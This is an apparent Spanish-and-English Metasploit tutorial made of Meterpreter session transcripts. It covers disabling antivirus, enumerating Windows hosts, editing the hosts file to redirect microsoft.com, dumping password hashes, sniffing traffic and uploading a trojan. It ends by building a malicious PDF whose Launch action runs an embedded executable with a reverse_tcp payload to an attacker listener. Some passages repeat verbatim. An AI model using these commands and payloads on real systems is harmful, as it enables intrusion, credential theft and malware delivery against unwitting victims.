meterpreter > run checkvm [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........ [*] This is a VMware Workstation/Fusion Virtual Machine
meterpreter > run getcountermeasure [*] Running Getcountermeasure on the target... [*] Checking for contermeasures... [*] Getting Windows Built in Firewall configuration... [*] [*] Domain profile configuration: [*] ------------------------------------------------------------------- [*] Operational mode = Disable [*] Exception mode = Enable [*] [*] Standard profile configuration: [*] ------------------------------------------------------------------- [*] Operational mode = Disable [*] Exception mode = Enable [*] [*] Local Area Connection 6 firewall configuration: [*] ------------------------------------------------------------------- [*] Operational mode = Disable [*] [*] Checking DEP Support Policy...
meterpreter > run getgui Windows Remote Desktop Enabler Meterpreter Script Usage: getgui -u -p OPTIONS: -e Enable RDP only. -h Help menu. -p The Password of the user to add. -u The Username of the user to add. meterpreter > run getgui -e [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez [email protected] [*] Enabling Remote Desktop [*] RDP is already enabled [*] Setting Terminal Services service startup mode [*] Terminal Services service is already set to auto [*] Opening port in local firewall if necessary
meterpreter > run gettelnet Windows Telnet Server Enabler Meterpreter Script Usage: gettelnet -u -p OPTIONS: -e Enable Telnet Server only. -h Help menu. -p The Password of the user to add. -u The Username of the user to add. meterpreter > run gettelnet -e [*] Windows Telnet Server Enabler Meterpreter Script [*] Setting Telnet Server Services service startup mode [*] The Telnet Server Services service is not set to auto, changing it to auto ... [*] Opening port in local firewall if necessary
meterpreter > run killav [*] Killing Antivirus services on the target... [*] Killing off cmd.exe...
meterpreter > run get_local_subnets Local subnet: 10.211.55.0/255.255.255.0
meterpreter > run hostsedit OPTIONS: -e Host entry in the format of IP,Hostname. -h Help Options. -l Text file with list of entries in the format of IP,Hostname. One per line. Example: run hostsedit -e 127.0.0.1,google.com run hostsedit -l /tmp/fakednsentries.txt meterpreter > run hostsedit -e 10.211.55.162,www.microsoft.com [*] Making Backup of the hosts file. [*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts62497.back [*] Adding Record for Host www.microsoft.com with IP 10.211.55.162 [*] Clearing the DNS Cache
meterpreter > run remotewinenum Remote Windows Enumeration Meterpreter Script This script will enumerate windows hosts in the target environment given a username and password or using the credential under witch Meterpreter is running using WMI wmic windows native tool. Usage: OPTIONS: -h Help menu. -p Password of user on target system -t The target address -u User on the target system (If not provided it will use credential of process) meterpreter > run remotewinenum -u administrator -p ihazpassword -t 10.211.55.128 [*] Saving report to /root/.msf3/logs/remotewinenum/10.211.55.128_20090711.0142 [*] Running WMIC Commands .... [*] running command wimic environment list [*] running command wimic share list [*] running command wimic nicconfig list [*] running command wimic computersystem list [*] running command wimic useraccount list [*] running command wimic group list [*] running command wimic sysaccount list [*] running command wimic volume list brief [*] running command wimic logicaldisk get description,filesystem,name,size [*] running command wimic netlogin get name,lastlogon,badpasswordcount [*] running command wimic netclient list brief [*] running command wimic netuse get name,username,connectiontype,localname [*] running command wimic share get name,path [*] running command wimic nteventlog get path,filename,writeable [*] running command wimic service list brief [*] running command wimic process list brief [*] running command wimic startup list full [*] running command wimic rdtoggle list [*] running command wimic product get name,version [*] running command wimic qfe list
meterpreter > run remotewinenum Remote Windows Enumeration Meterpreter Script This script will enumerate windows hosts in the target environment given a username and password or using the credential under witch Meterpreter is running using WMI wmic windows native tool. Usage: OPTIONS: -h Help menu. -p Password of user on target system -t The target address -u User on the target system (If not provided it will use credential of process) meterpreter > run remotewinenum -u administrator -p ihazpassword -t 10.211.55.128 [*] Saving report to /root/.msf3/logs/remotewinenum/10.211.55.128_20090711.0142 [*] Running WMIC Commands .... [*] running command wimic environment list [*] running command wimic share list [*] running command wimic nicconfig list [*] running command wimic computersystem list [*] running command wimic useraccount list [*] running command wimic group list [*] running command wimic sysaccount list [*] running command wimic volume list brief [*] running command wimic logicaldisk get description,filesystem,name,size [*] running command wimic netlogin get name,lastlogon,badpasswordcount [*] running command wimic netclient list brief [*] running command wimic netuse get name,username,connectiontype,localname [*] running command wimic share get name,path [*] running command wimic nteventlog get path,filename,writeable [*] running command wimic service list brief [*] running command wimic process list brief [*] running command wimic startup list full [*] running command wimic rdtoggle list [*] running command wimic product get name,version [*] running command wimic qfe listEl script 'winenum' hace de una herramienta muy detallada enumeración de las ventanas. Volcado de ficheros, hashes y mucho más.meterpreter > run winenum [*] Running Windows Local Enumerion Meterpreter Script [*] New session on 10.211.55.128:4444... [*] Saving report to /root/.msf3/logs/winenum/10.211.55.128_20090711.0514-99271/10.211.55.128_20090711.0514-99271.txt [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........ [*] This is a VMware Workstation/Fusion Virtual Machine [*] Running Command List ... [*] running command cmd.exe /c set [*] running command arp -a [*] running command ipconfig /all [*] running command ipconfig /displaydns [*] running command route print [*] running command net view [*] running command netstat -nao [*] running command netstat -vb [*] running command netstat -ns [*] running command net accounts [*] running command net accounts /domain [*] running command net session [*] running command net share [*] running command net group [*] running command net user [*] running command net localgroup [*] running command net localgroup administrators [*] running command net group administrators [*] running command net view /domain [*] running command netsh firewall show config [*] running command tasklist /svc [*] running command tasklist /m [*] running command gpresult /SCOPE COMPUTER /Z [*] running command gpresult /SCOPE USER /Z [*] Running WMIC Commands .... [*] running command wmic computersystem list brief [*] running command wmic useraccount list [*] running command wmic group list [*] running command wmic service list brief [*] running command wmic volume list brief [*] running command wmic logicaldisk get description,filesystem,name,size [*] running command wmic netlogin get name,lastlogon,badpasswordcount [*] running command wmic netclient list brief [*] running command wmic netuse get name,username,connectiontype,localname [*] running command wmic share get name,path [*] running command wmic nteventlog get path,filename,writeable [*] running command wmic process list brief [*] running command wmic startup list full [*] running command wmic rdtoggle list [*] running command wmic product get name,version [*] running command wmic qfe [*] Extracting software list from registry [*] Finished Extraction of software list from registry [*] Dumping password hashes... [*] Hashes Dumped [*] Getting Tokens... [*] All tokens have been processed [*] Done!
meterpreter > run scraper [*] New session on 10.211.55.128:4444... [*] Gathering basic system information... [*] Dumping password hashes... [*] Obtaining the entire registry... [*] Exporting HKCU [*] Downloading HKCU (C:\WINDOWS\TEMP\LQTEhIqo.reg) [*] Cleaning HKCU [*] Exporting HKLM [*] Downloading HKLM (C:\WINDOWS\TEMP\GHMUdVWt.reg)
meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays information about active channels ...snip...
meterpreter > background msf exploit(ms08_067_netapi) > sessions -i 1 [*] Starting interaction with 1... meterpreter >
meterpreter > ps Process list ============ PID Name Path --- ---- ---- 132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 288 snmp.exe C:\WINDOWS\System32\snmp.exe ...snip...
meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP [*] Current server process: svchost.exe (1076) [*] Migrating to explorer.exe... [*] Migrating into process ID 816 [*] New server process: Explorer.EXE (816) meterpreter >
meterpreter > ls Listing: C:\Documents and Settings\victim ========================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2009 . 40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2009 .. 100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel 40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2009 Application Data ...snip...
meterpreter > download c:\\boot.ini [*] downloading: c:\boot.ini -> c:\boot.ini [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini meterpreter >
meterpreter > upload evil_trojan.exe c:\\windows\\system32 [*] uploading : evil_trojan.exe -> c:\windows\system32 [*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe meterpreter >
meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0c:29:10:f5:15 IP Address : 192.168.1.104 Netmask : 255.255.0.0 meterpreter >
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
meterpreter > execute -f cmd.exe -i -H Process 38320 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
meterpreter > shell Process 39640 created. Channel 2 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
meterpreter > idletime User has been idle for: 5 hours 26 mins 35 secs meterpreter >
meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: meterpreter >
meterpreter > getdesktopSession 0\WinSta0\Default
meterpreter > use espiaLoading extension espia...success.
meterpreter > screengrabScreenshot saved to: C:/Archivos de programa/Rapid7/framework/msf3/EetdCkva.jpeg
meterpreter > use snifferLoading extension sniffer...success.
meterpreter > sniffer_interfaces1 - 'Adaptador Ethernet PCI AMD PCNET Family' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
meterpreter > sniffer_start 1[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_stats 1[*] Capture statistics for interface 1 packets: 2 bytes: 329
meterpreter > sniffer_dump 1 target.pcap[*] Flushing packet capture buffer for interface 1...[*] Flushed 2 packets (369 bytes)[*] Downloaded 100% (369/369)...[*] Download completed, converting to PCAP...[*] PCAP file written to target.pcap
meterpreter > sniffer_stop 1[*] Capture stopped on interface 1[*] There are packets ( bytes) remaining[*] Download or release them using 'sniffer_dump' or 'sniffer_release'meterpreter >
windows/fileformat/adobe_pdf_embedded_exe
msf > use windows/fileformat/adobe_pdf_embedded_exemsf exploit(adobe_pdf_embedded_exe) > show optionsModule options: Name Current Setting Required Description ---- --------------- -------- ----------- EXENAME no The Name of payload exe. FILENAME evil.pdf no The output filename. INFILENAME yes The Input PDF filename. OUTPUTPATH ./data/exploits/ no The location to output the file.Exploit target: Id Name -- ---- 0 Adobe Reader v8.x, v9.x (Windows XP SP3 English)
C:\Archivos de programa\Metasploit\Framework3\msf3\modules\exploits\windows\fileformat\
output << "#{obj_num.to_i + 4} 0 obj\r<</S/Launch/Type/Action/Win<</F(cmd.exe)/D(c:\\\\windows\\\\system32)/P(/Q /C (if exist \"%HOMEPATH%\\\\My Documents\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\My Documents\"))&(if exist \"%HOMEPATH%\\\\Desktop\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\Desktop\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\My Documents\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%& cd \"My Documents\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\Desktop\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%&cd Desktop))&&(ren #{pdf_name}.pdf #{pdf_name}.exe&start #{pdf_name}.exe))>>>>\rendobj\r"
output << "#{obj_num.to_i + 4} 0 obj\r<</S/Launch/Type/Action/Win<</F(cmd.exe)/D(c:\\\\windows\\\\system32)/P(/Q /C (if exist \"%HOMEPATH%\\\\My Documents\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\My Documents\"))&(if exist \"%HOMEPATH%\\\\Desktop\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\Desktop\"))&(if exist \"%HOMEPATH%\\\\Mis documentos\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\Mis documentos\"))&(if exist \"%HOMEPATH%\\\\Escritorio\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\Escritorio\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\Mis documentos\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%& cd \"Mis documentos\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\Escritorio\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%&cd Escritorio))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\My Documents\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%& cd \"My Documents\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\Desktop\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%&cd Desktop))&&(ren #{pdf_name}.pdf #{pdf_name}.exe&start #{pdf_name}.exe))>>>>\rendobj\r"
[ 'Adobe Reader v8.x, v9.x (Windows XP SP3 English, Español (modified by July & L00PeR))', { 'Ret' => '' } ]
=[ metasploit v3.3.3-release [core:3.3 api:1.0]+ -- --=[ 481 exploits - 220 auxiliary+ -- --=[ 192 payloads - 22 encoders - 8 nops =[ svn r7957 updated -2895 days ago (2009.12.23)msf > search adobe_pdf_embedded_exe[*] Searching loaded modules for pattern 'adobe_pdf_embedded_exe'...Exploits======== Name Rank Description ---- ---- ----------- windows/fileformat/adobe_pdf_embedded_exe excellent Adobe PDF Embedded EXE Social Engineeringmsf > use windows/fileformat/adobe_pdf_embedded_exemsf exploit(adobe_pdf_embedded_exe) > show optionsModule options: Name Current Setting Required Description ---- --------------- -------- ----------- EXENAME no The Name of payload exe. FILENAME evil.pdf no The output filename. INFILENAME yes The Input PDF filename. OUTPUTPATH ./data/exploits/ no The location to output the file.Exploit target: Id Name -- ---- 0 Adobe Reader v8.x, v9.x (Windows XP SP3 English, Español (modified by July & L00PeR))
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME C:\\hackxcrack.pdfINFILENAME => C:\hackxcrack.pdfmsf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(adobe_pdf_embedded_exe) > set Lhost 192.168.1.100Lhost => 192.168.1.100msf exploit(adobe_pdf_embedded_exe) > set id 0id => 0msf exploit(adobe_pdf_embedded_exe) > exploit
use exploit/windows/fileformat/adobe_pdf_embedded_exe [El exploit para ejecutar un el PAYLOAD al abrir un PDF]set FILENAME nombre_salida.pdf [El nombre que tendrá el PDF una vez modificado por msf]set INFILENAME /root/nombre_entrada.pdf [El nombre del PDF que será infectado]set OUTPUTPATH /root/ [Directorio donde se guardará el PDF]set PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.150.128 [IP que estará a la escucha para que se conecte el PAYLOAD]set LPORT 4444 [Puerto a la escucha]set id 0 [El S.O. y la versión del Adobe Reader que vulnera el exploit]exploit
[*] Started reverse handler on port 4444[*] Reading in 'C:\hackxcrack.pdf'...[*] Parsing 'C:\hackxcrack.pdf'...[*] Parsing Successful.[*] Using 'windows/meterpreter/reverse_tcp' as payload...[*] Creating 'evil.pdf' file...[*] Generated output file /msf3/data/exploits/evil.pdf[*] Exploit completed, but no session was created.msf exploit(adobe_pdf_embedded_exe) >
meterpreter > upload C:\\evil.pdf C:\\[*] uploading : C:\evil.pdf -> C:\[*] uploaded : C:\evil.pdf -> C:\\evil.pdfmeterpreter > shellProcess 1140 created.Channel 2 created.Microsoft Windows XP [Versión 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system32>cd..cd..C:\WINDOWS>cd..cd..C:\>dirdir El volumen de la unidad C no tiene etiqueta. El número de serie del volumen es: 84FF-4018 Directorio de C:\08/01/2002 13:21 <DIR> Archivos de programa08/03/2012 02:05 0 AUTOEXEC.BAT08/03/2012 02:05 0 CONFIG.SYS08/01/2002 13:20 <DIR> Documents and Settings17/01/2002 20:04 453.609 evil.pdf08/01/2002 15:45 0 kbs.txt08/01/2002 15:57 <DIR> WINDOWS 4 archivos 453.609 bytes 3 dirs 9.114.456.064 bytes libresC:\>start evil.pdfMuy bien hemos terminado tengan cuidado con el antivirua y a la pc remoto salta un cartelito para guardad que muchos no saben guardan y nos conectamos sin problemasstart evil.pdfC:\>exitmeterpreter >